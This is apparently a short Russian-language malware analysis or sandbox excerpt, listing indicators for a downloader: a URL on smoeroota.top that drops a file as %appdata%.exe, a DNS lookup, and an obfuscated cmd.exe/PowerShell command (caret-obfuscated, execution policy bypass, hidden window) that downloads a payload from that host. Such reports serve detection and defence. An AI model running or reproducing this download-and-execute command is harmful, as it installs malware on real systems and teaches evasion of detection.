Техническая информация
- http://smoeroota.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^OWerShELL.E^xe -exECU^TI^O^nP^OlicY by^P^asS -n^op^R^OfiLe -WINdoWsT^Yle hIdDEN ^(^NeW-Ob^Ject ^SYS^T^em.Net.^w^EB^CLiEn^T)^.^d^O^WN^Loa^D^FilE^('http://smoeroota.top/read.php?f...
- DNS ASK sm###oota.top
- '<SYSTEM32>\cmd.exe' /C "P^OWerShELL.E^xe -exECU^TI^O^nP^OlicY by^P^asS -n^op^R^OfiLe -WINdoWsT^Yle hIdDEN ^(^NeW-Ob^Ject ^SYS^T^em.Net.^w^EB^CLiEn^T)^.^d^O^WN^Loa^D^FilE^('http://smoeroota.top/read.php?f...' (со скрытым окном)